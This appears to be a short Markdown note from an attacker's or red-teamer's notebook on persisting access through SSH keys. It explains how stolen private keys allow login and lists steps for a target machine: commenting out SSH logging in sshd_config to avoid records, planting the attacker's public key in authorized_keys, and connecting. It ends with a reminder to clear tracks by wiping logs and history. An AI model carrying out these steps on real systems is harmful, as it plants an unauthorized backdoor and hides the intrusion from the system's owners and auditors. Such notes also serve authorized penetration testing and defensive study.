43 lines
2 KiB
Markdown
43 lines
2 KiB
Markdown
|
|
||
|
## General
|
||
|
|
||
|
Account manipulation using SSH keys is a way for an attacker to gain access to a system without using a password. SSH (Secure Shell) keys are used to authenticate a user to a remote system, allowing them to log in without entering a password. Instead of a password, the user presents a private key file, which is then verified against a public key that is stored on the remote system. If the keys match, the user is authenticated and granted access to the system.
|
||
|
|
||
|
An attacker who has gained access to a user's private SSH key can use it to log in to the system without knowing the user's password. This can be done by copying the private key to the attacker's own system and using it to authenticate to the remote system. If the attacker is able to do this, they will be able to log in to the system and perform actions as if they were the legitimate user. This can allow the attacker to gain unauthorized access to sensitive data or to perform actions that would not normally be allowed.
|
||
|
|
||
|
|
||
|
## Command
|
||
|
|
||
|
Modify /etc/ssh/sshd_config (Target Machine)
|
||
|
```
|
||
|
# Comment Elements
|
||
|
# LogLevel INFO ---> Comment this not not store the logs of the SSH
|
||
|
# PasswordAuthentication yes ---> Because we use a SSH Key to login
|
||
|
|
||
|
# Uncomment Elements
|
||
|
PubkeyAuthentication yes ---> Allow login with SSH Keys
|
||
|
```
|
||
|
|
||
|
Generating SSH Keys (Attacking Machine)
|
||
|
```
|
||
|
# Generate SSH Keys
|
||
|
ssh-keygen ---> Generate SSH key pair
|
||
|
|
||
|
# Copy the SSH Keys
|
||
|
ls -al ---> List folder in home directory to see if .ssh folder is there
|
||
|
mkdir .ssh ---> Create .ssh folder if needed
|
||
|
nano authorized_keys ---> Create file for keys, and paste your id_rsa.pub value
|
||
|
SAVE
|
||
|
|
||
|
chmod 700 /home/USER/.ssh ---> Give the right permission to folder
|
||
|
chmod 600 /gome/USER/.ssh/authorized_keys ---> Give the right permission to file
|
||
|
```
|
||
|
|
||
|
SSH Connection (Attacking Machine)
|
||
|
```
|
||
|
ssh USER@IP
|
||
|
```
|
||
|
|
||
|
|
||
|
|
||
|
===Dont Forget to Clear Tracks (Check [[🧹 CLEAR Logs & History]])===
|